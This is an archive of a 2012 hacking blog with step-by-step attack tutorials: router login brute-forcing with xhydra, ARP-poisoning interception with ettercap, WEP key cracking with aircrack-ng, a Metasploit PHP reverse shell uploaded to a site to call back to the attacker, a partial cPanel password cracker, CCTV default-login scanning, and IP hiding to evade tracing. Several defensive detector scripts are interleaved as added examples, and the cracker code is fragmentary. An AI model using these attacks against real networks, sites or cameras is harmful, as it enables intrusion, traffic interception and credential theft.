Tuesday, 25 December 2012

Cracking a password of Router with Hydra

Leaving your wireless router at its default settings is a bad idea. The sad thing is, most people still do it. Once they've penetrated your network, hackers will change your router settings so they'll have an easy way back in. This allows them to turn your network into a shell or proxy so they can forward their traffic anonymously through you when committing other dirty deeds.
If you keep your wireless router at the defaults, then hackers can control your firewall, what ports are forwarded, and more.

Now we're going to attack our routers. The default IP address/URL to reach it at will be, so test that address in a browser to confirm it. If you get a login dialog box, you've reached your router; it is running HTTP basic authentication.

1. cmd: xhydra
2. Enter as your target.
3. Use http-get as the method.
4. Port 80.
5. Pick a word list saved on your computer.
6. Click start!

Game is over 
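The brute-force run above leaves a very recognisable trail on the router side: a burst of 401 responses from one client, then a 200 when a wordlist entry matches. The following is an added example (not code from the original post) that flags exactly that pattern in an access log. The log lines are constructed and assume the Apache/nginx "combined" format; whether a given router logs in that format is an assumption, so LOG_RE would need adjusting to the device's real log line.

```python
"""Detect HTTP basic-auth brute forcing, like the xhydra run above, in a web-server access log.

Added example, not code from the original post. The log lines are constructed and
use the Apache/nginx "combined" format (an assumption; adjust LOG_RE for other devices).
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample: 192.168.1.50 runs a wordlist against the admin page (401 after
# 401) and then gets a 200, i.e. a guess worked. 192.168.1.20 is a user who mistyped once.
SAMPLE_LOG = """\
192.168.1.50 - - [25/Dec/2012:10:00:01 +0000] "GET / HTTP/1.1" 401 381 "-" "Mozilla/4.0 (compatible)"
192.168.1.50 - - [25/Dec/2012:10:00:01 +0000] "GET / HTTP/1.1" 401 381 "-" "Mozilla/4.0 (compatible)"
192.168.1.50 - - [25/Dec/2012:10:00:02 +0000] "GET / HTTP/1.1" 401 381 "-" "Mozilla/4.0 (compatible)"
192.168.1.50 - - [25/Dec/2012:10:00:02 +0000] "GET / HTTP/1.1" 401 381 "-" "Mozilla/4.0 (compatible)"
192.168.1.50 - - [25/Dec/2012:10:00:03 +0000] "GET / HTTP/1.1" 401 381 "-" "Mozilla/4.0 (compatible)"
192.168.1.50 - admin [25/Dec/2012:10:00:03 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/4.0 (compatible)"
192.168.1.20 - - [25/Dec/2012:10:00:05 +0000] "GET / HTTP/1.1" 401 381 "-" "Mozilla/5.0"
192.168.1.20 - admin [25/Dec/2012:10:00:09 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "user": m.group("user"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "status": int(m.group("status")),
    }

def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Return a list of (ip, kind, failures_in_window).

    kind == "bruteforce"         : at least `threshold` 401s from one client inside `window`
    kind == "bruteforce-success" : a 2xx from a client already flagged, i.e. a guess got in
    Each client is flagged once; a success after the flag is the event that should page someone.
    """
    failures = defaultdict(deque)   # ip -> timestamps of recent 401s
    flagged = set()
    alerts = []
    for raw in lines:
        ev = parse_line(raw)
        if ev is None:
            continue
        q = failures[ev["ip"]]
        while q and ev["ts"] - q[0] > window:   # slide the window forward
            q.popleft()
        if ev["status"] == 401:
            q.append(ev["ts"])
            if len(q) >= threshold and ev["ip"] not in flagged:
                flagged.add(ev["ip"])
                alerts.append((ev["ip"], "bruteforce", len(q)))
        elif 200 <= ev["status"] < 300 and ev["ip"] in flagged:
            alerts.append((ev["ip"], "bruteforce-success", len(q)))
    return alerts

def run_sample():
    return detect_bruteforce(SAMPLE_LOG.splitlines())

if __name__ == "__main__":
    for ip, kind, n in run_sample():
        print(f"{kind:20s} {ip} ({n} failures in window)")
```

The threshold and window are deliberately low for the eight-line sample; on a real device raise them until ordinary mistyped logins stop triggering, and treat "bruteforce-success" as the signal to rotate the admin password and review port-forwarding and DNS settings, which is what the post says an intruder changes first.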

Monday, 10 December 2012

Email hacking using Metasploit (remotely)

Demo of email hacking using Metasploit (remotely) on www.youtube.com

Rootkit with source code

A rootkit is a stealthy type of software, often malicious, designed to hide the existence of certain processes or programs from normal methods of detection and to enable continued privileged access to a computer. The term rootkit is a concatenation of "root" (the traditional name of the privileged account on Unix operating systems) and the word "kit" (which refers to the software components that implement the tool). The term "rootkit" has negative connotations through its association with malware.
Rootkit installation can be automated, or an attacker can install it once they've obtained root or Administrator access. Obtaining this access is the result of a direct attack on a system (i.e. exploiting a known vulnerability or a password, whether by cracking, privilege escalation, or social engineering). Once installed, it becomes possible to hide the intrusion as well as to maintain privileged access. The key is the root/Administrator access: full control over a system means that existing software can be modified, including software that might otherwise be used to detect or circumvent the rootkit.
Rootkit detection is difficult because a rootkit may be able to subvert the software that is intended to find it. Detection methods include using an alternative and trusted operating system, behavioral-based methods, signature scanning, difference scanning, and memory dump analysis. Removal can be complicated or practically impossible, especially in cases where the rootkit resides in the kernel; reinstallation of the operating system may be the only available solution to the problem. When dealing with firmware rootkits, removal may require hardware replacement or specialized equipment.
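One of the detection approaches named above, comparing a trusted record of the system against what is on disk now, is simple enough to show end to end. The following is an added example, not code from the original post: it builds a throwaway directory with constructed files standing in for system binaries, records a baseline of SHA-256 hashes, then replaces one file, deletes one and adds one (the kinds of changes a user-mode rootkit makes), and reports the differences. The baseline only has value if it is kept where a root-level intruder cannot rewrite it (read-only media or another host), and it is only trustworthy if the hashing is run from a clean boot, since a kernel rootkit can lie to the scanner about file contents.

```python
"""File-integrity baseline check: one of the rootkit detection methods listed above.

Added example, not code from the original post. All files are constructed in a
temporary directory; the paths imitate a Unix layout but nothing here touches the
real system.
"""
import hashlib
import os
import tempfile

def sha256_file(path, chunk=65536):
    """Hash a file in chunks so large binaries do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()

def build_baseline(root):
    """Map every regular file under root (path relative to root) to its SHA-256."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = sha256_file(full)
    return baseline

def compare(baseline, current):
    """Return {'modified': [...], 'missing': [...], 'added': [...]}, each sorted."""
    return {
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "missing": sorted(p for p in baseline if p not in current),
        "added": sorted(p for p in current if p not in baseline),
    }

def _write(root, rel, data):
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as f:
        f.write(data)

def demo():
    """Build a constructed 'system', baseline it, tamper with it, and diff."""
    with tempfile.TemporaryDirectory() as root:
        for rel, data in {"bin/ls": b"ls v1", "bin/ps": b"ps v1", "etc/passwd": b"root:x:0:0"}.items():
            _write(root, rel, data)
        baseline = build_baseline(root)
        # Tampering of the kind a user-mode rootkit performs:
        _write(root, "bin/ps", b"ps v1 + hide pid")        # trojaned ps that hides processes
        os.remove(os.path.join(root, "bin/ls"))            # a tool removed outright
        _write(root, "etc/ld.so.preload", b"/lib/evil.so")  # library preloaded into every process
        return compare(baseline, build_baseline(root))

if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind:9s}: {', '.join(paths) or '-'}")
```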

Rootkits with source code 

Communication between 2 hackers

Communication between 2 hackers using the 'invisible secret 4' software

1. Email communication between two hackers.
2. Data recovery after the DoD standard data format used by PGP and others

Sunday, 30 September 2012

MITM with Ettercap

Hello readers, we are back with our tutorials on Matriux; due to some unwanted circumstances we weren't able to be a part of last month's issue. However, we promise to provide our continued support and help to the users. This month we are going to cover a basic tutorial of a Man-In-The-Middle (MITM) attack using Ettercap with the ARP spoofing technique.

Ettercap is a great tool, especially for Man-In-The-Middle attacks. It is a very simple and easy-to-use tool to intercept data over a LAN and between systems connected over switched routers, and to execute MITM attacks.
"Ettercap is a multipurpose sniffer/interceptor/logger for switched LAN. It supports active and passive dissection of many protocols (even ciphered ones) and includes many features for network and host analysis." – quoted from the Ettercap website.


MITM with Ettercap by ARP poisoning

Requirement: the target system must be in the same network as our attacker, Matriux (it can be used against systems communicating over routers too, but let's make it easy ;)).

Ettercap can be found in Matriux under Arsenal > Scanning > Ettercap. I prefer that we use the console mode for a better understanding of the attack procedure.

Attack Setup
-----------------------------------------------------------------------------------------
1. Enable IP forwarding by typing the following in a terminal.

2. Edit the file /etc/etter.conf (it may be present at a different location in a different version; try "locate etter.conf"). Uncomment the following lines by removing the "#" where present.
3. Open another terminal and type "driftnet -i <<interface>>", using the interface through which you are able to communicate with the target system (in my case it was eth1). You will see a black window come up.

Initiating the Attack

Open a terminal as root and start the attack by typing:
~# ettercap -Tq -M arp:remote /<<IP of target>>/

The IP of the target can also be a group of IP addresses.

Now you can see the data, passwords and everything being browsed or passed over the internet from the target in the Ettercap window, and also the images the target is browsing in the driftnet window we opened up earlier.

Now you have successfully performed a MITM attack using Ettercap by ARP spoofing. You can also try changing the data the target system is exchanging with the internet.
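What arp:remote does to the LAN is also what gives it away: one MAC address suddenly answers for both the gateway and the target, and the target's and gateway's IP-to-MAC bindings flip. The following is an added example, not code from the article, that applies those two checks to a list of ARP replies. The replies are constructed; on a real network they would come from a sniffer or from periodic arp -a snapshots, and the gateway's MAC would be pinned from a known-good record.

```python
"""Detect the ARP poisoning that 'ettercap -M arp:remote' performs, from a log of ARP replies.

Added example, not from the article. The ARP replies are constructed.
"""
from collections import defaultdict

# Constructed ARP replies: (timestamp, sender IP, sender MAC).
# 10.0.0.1 is the gateway, 10.0.0.7 the target; 00:aa:bb:cc:dd:ee is the poisoning host.
ARP_REPLIES = [
    (1, "10.0.0.1", "00:11:22:33:44:01"),   # legitimate gateway
    (2, "10.0.0.7", "00:11:22:33:44:07"),   # legitimate target
    (3, "10.0.0.9", "00:11:22:33:44:09"),   # unrelated host
    (10, "10.0.0.1", "00:aa:bb:cc:dd:ee"),  # attacker claims to be the gateway
    (10, "10.0.0.7", "00:aa:bb:cc:dd:ee"),  # ...and the target (both directions: arp:remote)
    (11, "10.0.0.1", "00:aa:bb:cc:dd:ee"),  # repeated poison; must not create a new alert
]

def detect_arp_spoof(replies, trusted=None):
    """Return sorted, de-duplicated alert strings.

    trusted: optional {ip: mac} of bindings known to be correct (e.g. the gateway);
    any reply contradicting them is reported even if it is the first one seen.
    """
    trusted = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    seen_mac = {}                       # ip -> last MAC that announced it
    ips_per_mac = defaultdict(set)      # mac -> every IP it has claimed
    alerts = set()
    for _ts, ip, mac in replies:
        mac = mac.lower()
        if ip in trusted and trusted[ip] != mac:
            alerts.add(f"{ip} announced by {mac}, pinned to {trusted[ip]}")
        if ip in seen_mac and seen_mac[ip] != mac:
            alerts.add(f"{ip} changed MAC {seen_mac[ip]} -> {mac}")
        seen_mac[ip] = mac
        ips_per_mac[mac].add(ip)
        if len(ips_per_mac[mac]) > 1:
            alerts.add(f"{mac} claims multiple IPs: {', '.join(sorted(ips_per_mac[mac]))}")
    return sorted(alerts)

def run_sample():
    return detect_arp_spoof(ARP_REPLIES, trusted={"10.0.0.1": "00:11:22:33:44:01"})

if __name__ == "__main__":
    for line in run_sample():
        print(line)
```

A MAC legitimately claiming several IPs (a router with aliases, a virtualisation host) will trip the second check, so maintain an allow-list for those; the pinned-gateway check is the one with the fewest false positives and the highest value, since the gateway is what arp:remote must impersonate.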

EtherApe – Graphical Network Monitoring

Hello readers, we are back again with a new release, Matriux Krypton, at nullcon Tritiya, Goa 2012. Thank you for your support throughout these years, which has enabled us to bring in bigger and better security solutions. This version includes some great features with 300 powerful penetration testing and forensic tools. The UI is made more elegant and faster. Based on Debian Squeeze with a custom compiled kernel 2.3.39-krypton, Matriux is the fastest distribution of its kind and runs easily on a P-IV with as little as 256MB RAM and just 6GB HDD. New tools included are reaver-wps, androguard, apkinspector, an SSH server and many more. The installer (MID) is made easier this time.

Doesn't it look cool? Go ahead, give it a try and let us know what you think of the new version.
Now coming to this month's article on EtherApe, which is an open source graphical network monitor for Unix systems. It displays the network activity graphically, with host and link sizes shrinking and growing in accordance with the traffic activity. Protocols are color coded. Some features of EtherApe include:
  • Network view can be modified by applying filters
  • Can read traffic from a file as well as from the network
  • A variety of protocols, packet types and frames are supported
  • Clicking on any link or node will provide additional information regarding the protocols and traffic
  • Handles traffic on Ethernet, WLAN, VLAN plus several other media and encapsulation types
  • Output can be exported into an XML file (supported from version 0.9.11)
EtherApe can be found in the Matriux Arsenal under Arsenal --> Reconnaissance --> EtherApe (root)

Or simply fire up EtherApe by typing etherape in a terminal.
Note: Remember that EtherApe requires root permission to run, else you will get the error "No suitable Device found".
To start monitoring the network, select the network interface from the menu Capture --> Interfaces.

This will start reading the network data from the selected interface and display the network in a graphical representation.

When you start EtherApe, you may or may not see traffic depending on whether there is traffic actively passing through your network. (Here I pinged Google and opened the Matriux Forums in a browser to generate some network activity.)
Also, the data regarding this network activity can be viewed from the menu View --> Nodes/Protocol.

Showing the activity at the nodes.
Showing the activity with respect to protocols; this data is useful in many ways, to troubleshoot the network or to check for unwanted traffic etc.
Also, clicking on any link/node in the network map will display the activity at that node/link.

You can also configure EtherApe from the preferences in the menu.

EtherApe can also read a tcpdump file, which allows us to capture network traffic to a file and analyze that traffic later, in offline mode. The reason is that using EtherApe as root to remotely monitor the network is not recommended, as you run the risk of transmitting the root information over the network. EtherApe is a great tool for monitoring the network activity and its protocols. Go ahead and run EtherApe to see the visual beauty of the network ;)
Happy Hacking :)

Tuesday, 14 August 2012

Mobile phone unlocker software

Samsung mobile phone unlocker code

Warning :---> Before using this trick you need to move all your contacts to the SIM and remove the SIM, otherwise all your contacts will be erased.

Hi, I am Akshay Borse

Believe it or not, I just tried it with a V200 and it worked...
Enter these 5 reset codes WITHOUT a SIM card:

1. press *2767*63342#
2. press *2767*3855#
3. press *2767*2878#
4. press *2767*927#
5. press *2767*7822573738#
6. Now your phone has been unlocked.

Monday, 13 August 2012

Cracking WEP

In this section we will be using the live Linux distribution called BackTrack to crack WEP. BackTrack comes with a huge list of preloaded software for this very purpose.

Before we begin, there are a couple of requirements:
1. You need a computer with a compatible wireless adapter.
2. Download Backtrack and create a Live CD.

The tools we will be using on Backtrack are:
• Kismet – a wireless network detector
• airodump – captures packets from a wireless router
• aireplay – forges ARP requests
• aircrack – decrypts the WEP keys
Let’s begin!

1. First we will find a wireless access point along with its bssid, essid and channel number. To do this we will run Kismet by opening up the terminal and typing in . It may ask you for the appropriate adapter, which in my case is ath0. You can see your device's name by typing in the command iwconfig.

2. To be able to do some of the later things, your wireless adapter must be put into monitor mode. Kismet automatically does this and as long as you keep it open, your wireless adapter will stay in monitor mode.

3. In Kismet you will see the flags Y/N/0. Each one stands for a different type of encryption. In our case we will be looking for access points with WEP encryption. Y=WEP N=OPEN 0=OTHER (usually WAP).

4. Once you find an access point, open a text document and paste in the network's broadcast name (essid), its MAC address (bssid) and its channel number. To get the above information, use the arrow keys to select an access point and hit <ENTER> to get more information about it.

5. The next step is to start collecting data from the access point with airodump. Open up a new terminal and start airodump by typing in the command:

airodump-ng -c [channel#] -w [filename] --bssid [bssid] [device]

In the above command, airodump-ng starts the program, the channel of your access point goes after -c, the file you wish to output the data to goes after -w, and the MAC address of the access point goes after --bssid. The command ends with the device name. Make sure to leave out the brackets.

6. Leave the above running and open another terminal. Next we will send some fake packets to the target access point so that the speed of the data output increases. Put in the following command:
aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55:66 -e [essid] [device]

In the above command we are using the aireplay-ng program. The -1 tells the program the specific attack we wish to use, which in this case is fake authentication with the access point. The 0 is the delay between attacks, -a is the MAC address of the target access point, -h is your wireless adapter's MAC address, -e is the name (essid) of the target access point, and the command ends with your wireless adapter's device name.

7. Now we will force the target access point to send out a huge number of packets that we will be able to take advantage of by using them to attempt to crack the WEP key. Once the following command is executed, check your airodump-ng terminal and you should see the ARP packet count start to increase. The command is:
aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:5:66 [device]

In this command, the -3 tells the program the specific type of attack, which in this case is packet injection, -b is the MAC address of the target access point, -h is your wireless adapter's MAC address, and the wireless adapter device name goes at the end.

8. Once you have collected around 50k-500k packets, you may begin the attempt to break the WEP key. The command to begin the cracking process is:

aircrack-ng -a 1 -b [bssid] -n 128 [filename].ivs

In this command the -a 1 forces the program into WEP attack mode, the -b is the target's MAC address, and the -n 128 tells the program the WEP key length. If you don't know the -n, then leave it out. This should crack the WEP key within seconds. The more packets you capture, the bigger chance you have of cracking the WEP key.

With all the different computers and network adapters out there, you may come across an error occasionally. If you get stuck, remember, Google is your friend! Search for an answer and I guarantee you that 99% of the time you will find a solution.
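The packet counts in step 8 are not arbitrary: WEP prepends a 24-bit initialisation vector to each frame, so there are only 16,777,216 distinct RC4 keystreams per key, and a busy network reuses them within hours. The following is an added example, not from the tutorial, that works out the birthday-bound probability of an IV repeat (and so of keystream reuse) for a given number of captured frames. It is an illustration of the design flaw, not the statistics aircrack-ng actually uses; the practical point for defenders is that the flaw lives in the protocol, so neither key length (the -n 64/128 choice above) nor any router setting repairs it, and WEP simply has to be replaced.

```python
"""Why WEP falls to a few hundred thousand frames: the 24-bit IV space.

Added example, not from the tutorial. Birthday-bound estimates for IV reuse;
the exact key-recovery statistics used by cracking tools are more involved.
"""
import math

IV_BITS = 24
IV_SPACE = 2 ** IV_BITS          # 16,777,216 possible IVs per WEP key

def collision_probability(n, space=IV_SPACE):
    """P(at least one repeated IV among n frames), assuming IVs drawn uniformly.

    Birthday approximation: 1 - exp(-n(n-1) / (2*space)). Many WEP cards used a
    counter instead of random IVs, which only makes exhaustion more certain.
    """
    return 1.0 - math.exp(-n * (n - 1) / (2.0 * space))

def expected_collisions(n, space=IV_SPACE):
    """Expected number of colliding frame pairs among n frames: C(n, 2) / space."""
    return n * (n - 1) / (2.0 * space)

def frames_for_probability(p, space=IV_SPACE):
    """Smallest n for which the collision probability reaches p (inverts the bound)."""
    return math.ceil(math.sqrt(-2.0 * space * math.log(1.0 - p)))

def hours_to_exhaust(frames_per_second, space=IV_SPACE):
    """Time for a sequential-IV implementation to cycle through every IV once."""
    return space / frames_per_second / 3600.0

def summary(counts=(5_000, 50_000, 500_000)):
    """Collision probability and expected collisions for the tutorial's packet counts."""
    return {n: (collision_probability(n), expected_collisions(n)) for n in counts}

if __name__ == "__main__":
    for n, (p, e) in summary().items():
        print(f"{n:>8} frames: P(reuse) = {p:.4f}, expected reused pairs = {e:.1f}")
    print(f"50% chance of a reuse after {frames_for_probability(0.5)} frames")
    print(f"IV space cycles in {hours_to_exhaust(500):.1f} h at 500 frames/s")
```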

Wednesday, 20 June 2012

IP Address Spoofing By Terrorists

When we send emails and browse the internet, our computer's global IP address is automatically recorded by the service provider's servers, such as Gmail, MSN, PayPal etc.
When anyone commits an online crime such as credit card fraud or sending email to someone, the hacker can easily be traced by the government, police, etc., but professional hackers hide their IP address with a proxy, tunnel, VNC etc.
A proxy is the old trick; here we show you untraceable IP spoofing, so you can hide your real IP behind another IP address provided by http://www.usaip.eu/en/

Before IP spoofing, check your original geo-location from here: http://whatismyipaddress.com/

Download the VNC connection file from the following website

Now open the usaip.pbk file and select any other server; here I selected the China server.

After opening the file, connect to any server with demo as the username and demo as the password
user name-----> demo
password-----> demo


Finally, after IP spoofing, check your geo-location again from here: http://whatismyipaddress.com/

Before IP spoofing my geo-location was India
After IP spoofing my geo-location is China

Monday, 4 June 2012

PHP Connect Back with ShellCode

First you need your IP address ready. Be sure that it is your external IP address, not the internal one,
and pick a random port.

Make sure that the port is open (forwarded) in your router.

Now enter Metasploit and type the following commands

msf > use payload/php/reverse_php
msf payload(reverse_php) > set LHOST YOUR_IP_ADDRESS
msf payload(reverse_php) > set LPORT YOUR_PORT
msf payload(reverse_php) > set ENCODER php/base64
ENCODER => php/base64
msf payload(reverse_php) > generate -t raw

Once you are done with the above commands, it generates a shellcode which is encoded with Base64.
Now copy the whole generated string into a PHP file like this


Now save the file as something.php, upload the file onto any site and open it in the URL


If you have uploaded the file as shell.php,

now open the URL http://somesite.com/shell.php

Now you should get a shell back at your Metasploit console.
Enjoy Exploiting :)
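The file produced above has a shape that a server owner can look for: a long Base64 literal handed to eval(base64_decode(...)), and, once decoded, a connect-back call. The following is an added example, not code from the original post, that scans PHP source for those markers, decoding one layer of Base64 and re-checking the result. The two sample files are constructed; the "payload" inside the malicious one is a non-functional stand-in with placeholder names (ATTACKER_HOST, PAYLOAD_BODY) that merely carries the markers, and the marker lists are a starting point rather than a complete signature set.

```python
"""Scan PHP files for the shape of the encoded connect-back payload above.

Added example, not from the original post. Sample files are constructed; the
inner "payload" is a stand-in with placeholder identifiers, not working code.
"""
import base64
import re

# Functions that execute code or open sockets: not proof of a shell, but worth a look
SUSPICIOUS_CALLS = re.compile(
    r"\b(eval|assert|system|shell_exec|passthru|exec|popen|proc_open|fsockopen)\s*\(", re.I)
# Runtime decoders that legitimate page code rarely wraps around eval()
DECODERS = re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)
# Quoted literal of 40+ Base64-alphabet characters
B64_BLOB = re.compile(r"['\"]([A-Za-z0-9+/=]{40,})['\"]")
REQUEST_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")

def decode_blobs(src):
    """Decode every long Base64 literal that is valid Base64; return the texts."""
    out = []
    for blob in B64_BLOB.findall(src):
        try:
            out.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except (ValueError, UnicodeError):
            continue
    return out

def scan_php(src):
    """Return sorted indicator names found in src, including one layer of decoding."""
    found = set()
    if SUSPICIOUS_CALLS.search(src):
        found.add("dangerous-call")
    if DECODERS.search(src):
        found.add("runtime-decoder")
    decoded = decode_blobs(src)
    if decoded:
        found.add("long-base64-literal")
    for text in decoded:
        if SUSPICIOUS_CALLS.search(text):
            found.add("dangerous-call-in-decoded")
        if REQUEST_INPUT.search(text) or re.search(r"fsockopen|socket_create", text, re.I):
            found.add("remote-control-in-decoded")
    return sorted(found)

# Constructed samples. INNER_STANDIN is deliberately not runnable PHP: placeholder
# constants instead of a host, port or code body; it only carries the markers.
INNER_STANDIN = "fsockopen(ATTACKER_HOST, ATTACKER_PORT); eval(PAYLOAD_BODY);"
MALICIOUS_PHP = ("<?php eval(base64_decode('"
                 + base64.b64encode(INNER_STANDIN.encode()).decode() + "')); ?>")
BENIGN_PHP = '<?php echo "Hello " . htmlspecialchars($_GET["name"]); ?>'

def scan_samples():
    return {"benign": scan_php(BENIGN_PHP), "malicious": scan_php(MALICIOUS_PHP)}

if __name__ == "__main__":
    for name, hits in scan_samples().items():
        print(f"{name:9s}: {', '.join(hits) or 'clean'}")
```

Run over an upload directory this gives a triage list, not a verdict: templating code legitimately contains long Base64 (embedded images, for instance), so the combination that matters is a decoder feeding a dangerous call, which is exactly what the msf payload above produces.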

Sunday, 3 June 2012

Private Cpanel Cracker (Web hacking)


* Private Cpanel Cracker
* Coded by Miyachung
* miyachung@hotmail.com
* Janissaries.Org
* Demonstration -> http://www.youtube.com/watch?v=mLkudfIAPgA

class cracker

 public  $sitelist;
 public  $passlist;
 public function calis()
   $usernames   =  $this->make_username();
   $sitelist  = explode("\n",$this->openfile($this->sitelist)); 
   $passlist  = explode("\n",$this->openfile($this->passlist));
   $increment = 0;
   echo "\n\n[*]Site list -> $this->sitelist\n";
   echo "[*]Pass list -> $this->passlist\n";
   echo "[*]Total urls -> ".count($sitelist)."\n";
   echo "[*]Total pass -> ".count($passlist)."\n";
   echo "[*]Cracking started\n\n";
   foreach($sitelist as $id => $site)
   $site = trim($site);
   echo "-------------------------------------------------------\n";
   echo "[*]Trying site: ".$site." $increment / ".count($sitelist)."\n";
   $site = str_replace("http://","https://",$site);
   $site = "https://$site";
   $site= $site.":2083";
   echo "[-]Not cpanel,passing site\n";
   echo "-------------------------------------------------------\n\n";

   echo "[*]Connected Cpanel [OK]\n";
   echo "[*]Username: ".$usernames[$id]."\n";
   echo "[*]Loaded ".count($passlist)." passwords\n";
   echo "[*]Coded by Miyachung ||| Janissaries.Org\n";
    foreach($passlist as $pass)
     $cracked = false;
     $result = $this->post($site,$usernames[$id],$pass);
     $cracked = true;
     echo "[+]$pass password cracked for $usernames[$id]\n";
     echo "-------------------------------------------------------\n\n";
   if(!$cracked){echo "[-]Not found\n";echo "-----------------------------------\n\n";}
 private function make_username()
   $op = explode("\n",$this->openfile($this->sitelist));
   foreach($op as $site)
   if(eregi('http://',$site)) $site  = str_replace("http://","",$site);
   if(!eregi('www',$site))    $site  = "www.".$site;
   $site = explode(".",$site);
   $site = str_replace("-","",$site[1]);
   $usernames[] = substr($site,0,8);
   return $usernames;
 public function lists()
   echo "[!]Site list: ";
   $sitelist = fgets(STDIN);
   $sitelist = str_replace("\r\n","",$sitelist);
   $sitelist = trim($sitelist);
   echo "[!]Pass list: ";
   $passlist = fgets(STDIN);
   $passlist = str_replace("\r\n","",$passlist);
   $passlist = trim($passlist);
   return array($sitelist,$passlist);
 private function post($site,$user,$pass)
   $curl = curl_init();
   $exec = curl_exec($curl);
   return $exec;
 private function pass_site($site)
   $curl = curl_init();
   $exec = curl_exec($curl);
   $info = curl_getinfo($curl);
   if($info['http_code'] != 0)
   return true;
   return false;
 private function openfile($file)
   $file = @file_get_contents($file);
   if(!$file) exit("WTF File not found ?");
   return $file;
 private function savefile($content)
   $file = fopen('crackerlog.txt','ab');
   return $file;


$class      =   new cracker();
$lists      =   $class->lists();

   if(empty($lists[0]) || empty($lists[1])) exit("WTF Empty ? "); 
$class->sitelist   =   $lists[0];
$class->passlist   =   $lists[1];


Wednesday, 30 May 2012

Hacking CCTV Security Video Surveillance Systems with Metasploit

A new module for the Metasploit Framework, cctv_dvr_login, discovers and tests the security of standalone CCTV (Closed Circuit Television) video surveillance systems. Such systems are frequently deployed in retail stores, living communities, personal residences, and business environments as part of their physical security program. However, many of these systems are vulnerable to exploitation that can allow attackers remote access. Such remote access, enabled by default, can allow not only the ability to view real-time video, but control of the cameras (if supported), and provide access to archived footage.

Most owners of CCTV video surveillance systems may not even be fully aware of the device's remote access capabilities as monitoring may be conducted exclusively via the local video console. This further increases the likelihood of attackers gaining/persisting remote access, with no indication to the owner that their video surveillance system and archived footage may be accessed remotely.

Here at Gotham Digital Science, we often encounter video surveillance systems during penetration testing engagements – some of which may be exposed to the Internet, either intentionally or by accident. With any video surveillance system it is often interesting (and sometimes very important) to find out exactly what cameras are monitoring/recording within the environment. Furthermore, access to such systems can often be utilized to support physical security testing initiatives.

This module targets standalone CCTV video surveillance systems by MicroDigital, HIVISION, CTRing, and a substantial number of other rebranded devices.

msf > use auxiliary/scanner/misc/cctv_dvr_login
msf auxiliary(cctv_dvr_login) > set RHOSTS
RHOSTS =>
msf auxiliary(cctv_dvr_login) > exploit

[*] CCTV_DVR - [001/133] - Trying username:'admin' with password:''
[-] CCTV_DVR - [001/133] - Failed login as: 'admin'
[*] CCTV_DVR - [002/133] - Trying username:'user' with password:''
[-] CCTV_DVR - [002/133] - Invalid user: 'user'
[*] CCTV_DVR - [003/133] - Trying username:'admin' with password:'admin'
[-] CCTV_DVR - [003/133] - Failed login as: 'admin'
[*] CCTV_DVR - [004/133] - Trying username:'admin' with password:'1111'
[+] Successful login: 'admin' : '1111'
[*] Confirmed IE ActiveX HTTP interface (CtrWeb.cab v1,1,3,1):
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


CCTV DVR Login Scanning Utility

Sunday, 20 May 2012

Best browser for hackers with built-in features for hackers - OWASP Mantra Browser Security Framework for penetration testers

Mantra Browser is a highly recommended browser for hackers and penetration testers. It includes a security framework which can be very useful to scan various web servers or websites for different attacks like SQL injection and XSS attacks.

OWASP Mantra is an innovative product, a security framework built on top of a browser. It's cross-platform, portable and can run out of the box. You can take it with you wherever you go on absolutely any rewritable media, including memory cards, flash drives and portable hard disks. Moreover, Mantra Browser can be used for both offensive security and defensive security related tasks, which makes it incredible.
Mantra Browser is developed on Firefox, the open source browser by Mozilla, with a security framework added. The developers of the Mantra security toolkit also provide various tools or addons which can be installed directly in the Mantra browser. These tools can help hackers or penetration testers carry out some of their work.
Mantra Browser is available for different platforms: Windows, Linux 32-bit, Linux 64-bit, Macintosh.

Tools or Addons Available For Mantra Browser
OWASP Mantra is a powerful set of tools to make the attacker's task easier. The beta version of Mantra Security Toolkit contains the following tools built into it. Moreover, Mantra follows the guidelines and structure of FireCAT, which makes it even more accessible. You can also always suggest any tools/scripts that you would like to see in the next release.

1. Information Gathering Tools
3. Network Utilities
4. Application Auditing

For more information: http://www.getmantra.com

Saturday, 19 May 2012

SQL Injection Attack using Havij tool (web hacking)

SQL injection is an attack in which malicious code is inserted into strings that are later passed to an instance of SQL Server for parsing and execution. Any procedure that constructs SQL statements should be reviewed for injection vulnerabilities because SQL Server will execute all syntactically valid queries that it receives. Even parameterized data can be manipulated by a skilled and determined attacker.
SQL injection can be done by manual injection or via automatic tools. Automatic tools are easy to use and do not require much technical knowledge.

In this tutorial we will discuss Havij. Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.
